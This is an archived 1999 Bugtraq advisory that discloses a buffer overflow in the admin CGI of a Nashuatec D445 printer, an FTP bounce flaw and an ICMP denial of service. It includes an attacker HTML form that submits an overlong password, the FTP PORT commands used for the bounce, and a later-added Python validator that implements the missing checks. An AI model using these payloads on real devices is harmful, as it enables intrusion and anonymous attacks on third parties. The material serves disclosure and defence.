Bugtraq mailing list archives

NEUROCOM: Nashuatec printer, 3 vulnerabilities found


From: veille () NEUROCOM COM (gregory duchemin)
Date: Thu, 14 Oct 1999 15:45:01 -0000


hi,

The NASHUATEC D445 printer is vulnerable to many attacks.
There are 4 common services that run in a standard
configuration: httpd, ftpd, telnetd, printer.
(tested with nmap)

I discovered, last day, at least three different ways to
attack this kind of box.

First, it's possible to configure the server remotely via its
own admin web server (port 80).
Naturally the server will ask you for an admin password before
submitting the form to the cgi. The password field is 15
chars long but an intruder with a lightly modified copy of
the original form will be able to submit many more chars (
about 260 will be enough for the test ) to the cgi and
produce a buffer overflow. ( see the example below )
The cgi concerned is "reset" but I suppose every cgi is
exposed to this problem.
If our intruder decides to forge a special password with
instruction code inside he'll force the remote printer to
execute code with the target web server privilege.
I don't have, now, all the required information to gain
server privilege but you may find it here very soon :)

Attacker form example:

<HTML>
<HEAD>
<TITLE>Nashuadeath</TITLE>
</HEAD>
<BODY>
<HR>
<CENTER><FONT SIZE=+2><big><B>NIB 450-E</B></big></FONT></CENTER>
<HR>
<CENTER><FONT SIZE=+2>Unit Serial Number 599132</FONT></CENTER>
<HR>
<H2><CENTER>Reset Unit</CENTER></H2>
<HR>
<FORM ENCTYPE="application/x-www-form-urlencoded" METHOD="POST"
ACTION="http://victim-printer-ip/Forms/reset">
<B>A very big password is required to perform this function
( at least 260 chars length ).</B>
<INPUT TYPE="text" NAME="http_pwd" SIZE="100" MAXLENGTH="1500">
<INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
</FORM>

<HR>

<CENTER>[ Home | <A HREF="/info">Unit Info</A> ]
</CENTER>
</BODY>
</HTML>

Another flaw is present in the ftp daemon, which permits the
infamous "bounce attack".
ftp printer.victim.com
user xxxxx
pass xxxxx
quote port a1,a2,a3,a4,0,25

a1.a2.a3.a4 is any other ip address.

The ftp server checks neither the type of port in the
request ( < 1024 = administrative port ) nor the ip address
used.
So an intruder may use the service to attack some other
boxes anonymously.

The last one is a denial of service with an icmp redirect
storm against the printer ip stack.
Use winfreez.c to test it.
The printer will not respond anymore during the attack.

Have a nice day,

Gregory Duchemin.

-------------------------
NEUROCOM
http://www.neurocom.com
179/181 Avenue Charles de Gaulle
92200 Neuilly Sur Seine
Tel: 01.41.43.84.84     Fax: 01.41.43.84.80
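Added example, not part of the original post or the vendor's firmware: the two server-side input checks the post says the printer lacks, written in Python as a defender would specify them. The FTP side parses a PORT argument and refuses it unless the data connection goes back to the control peer on an unprivileged port; the HTTP side bounds the http_pwd field at the 15 characters the admin form allows. Function names and the sample addresses in the comments are assumptions drawn from the post.

```python
import ipaddress

# Limits taken from the post: the admin form's password field is 15
# characters, and ports below 1024 are the "administrative" range the
# printer's ftpd should have refused in a PORT command.
HTTP_PWD_MAX_LEN = 15
PRIVILEGED_PORT_MAX = 1023


def parse_port_argument(arg: str):
    """Parse the 'a1,a2,a3,a4,p1,p2' argument of an FTP PORT command.

    Returns (ip_string, port); raises ValueError on malformed input.
    """
    fields = arg.strip().split(",")
    if len(fields) != 6:
        raise ValueError("PORT needs six comma-separated numbers")
    nums = [int(f) for f in fields]
    if any(n < 0 or n > 255 for n in nums):
        raise ValueError("value out of 0..255 range")
    ip = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    return ip, port


def check_port_command(control_peer_ip: str, arg: str):
    """Apply the two checks the post says the printer's ftpd skipped.

    The data connection must go back to the host that opened the control
    connection and must not target a privileged (<1024) port.
    Returns (accepted, reason).
    """
    try:
        ip, port = parse_port_argument(arg)
    except ValueError as exc:
        return False, f"malformed PORT: {exc}"
    if ipaddress.ip_address(ip) != ipaddress.ip_address(control_peer_ip):
        return False, f"PORT target {ip} differs from control peer {control_peer_ip}"
    if port <= PRIVILEGED_PORT_MAX:
        return False, f"PORT target port {port} is in the privileged range"
    return True, "ok"


def check_http_pwd(value: str):
    """Bound the admin-form password server-side instead of trusting the
    form's MAXLENGTH; oversized input is refused before it reaches the CGI."""
    if len(value) > HTTP_PWD_MAX_LEN:
        return False, f"password field is {len(value)} chars, limit {HTTP_PWD_MAX_LEN}"
    return True, "ok"
```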

